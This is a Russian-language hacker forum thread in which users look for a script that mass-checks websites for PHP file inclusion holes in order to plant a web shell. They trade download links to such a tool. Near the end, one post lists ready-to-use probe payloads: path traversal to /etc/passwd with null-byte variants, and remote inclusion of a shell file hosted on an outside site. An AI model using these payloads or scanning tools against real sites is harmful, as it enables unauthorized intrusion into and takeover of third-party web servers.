Проверка на инклуд
 

ПОдскажите есть ли скрипт, который умеет определять есть ли возможность воспользоватся инклудом тоесть например зарядить ему список url такого вида www.site.com/index.php?page=а сюда наш шел

какой-то подобный самопис недавно выкладывали в этой же ветке, покапай предыдущие темы

Пролистал ветку почти доконца что то ненашел

скрипт от Nomer1

довольно долго искал, если кому-то надо, то вот:
http://forum.antichat.ru/showthread.php?t=82211

перезалил бы кто)

там вроде эта ссылка пашет
http://dump.ru/file/1021261/

http://www.sendspace.com/file/2n0w56
Залил на СС.

а есть что нить подобное толькто чтоб проверял массово из списка и удачные записовал

Любая автоматизация поиска уязвимостей - утопия, имхо. Со временем, конечно. Автоматизация же процесса получения данных на основе выявленной уязвимости - рулез форева.

я люблю находить в ручную. т.к. автоматом никого кайфа не получишь!

Поиск по известным классам уязвимостей - чуть ли не механическая работа, почему ж нет?..

Просто я думаю, хотя это конечно весьма сугубо, что понятие " известным классам уязвимостей " весьма быстро, в смысле гораздо быстрее, чем раньше, при современных темпах развития сети и т.д, переходит в понятие "пофиксили, забудь, дружище"

ЗЫЖ Предлагаю больше на эту тему на флудить, ибо и так высеры постим личностные, а ачад, на мой взгляд, либо по делу - либо флуд. За что и ценю

либо нах

?a=../../../../../../../../../../../../../../../../etc/passwd
?a=../../../../../../../../../../../../../../../../etc/passwd%00
?a=http://site.ru/shell.txt
?a=http://site.ru/shell.txt%00
ручками, чем не вариант =))?

Какой смысл использовать руки и делать однотонную работу? (MMORPG задротам посвящается)
Машина была придумана для того, что бы как раз избежать этой монотонной работы со стороны людей. Но походу у людях в генах заложено делать однотипную работу, и они к этому так стремятся.
Я лучше поставлю Бота, пускай проверяет ссылки, а сам займусь другими делами, тем самым сохранив больше времени.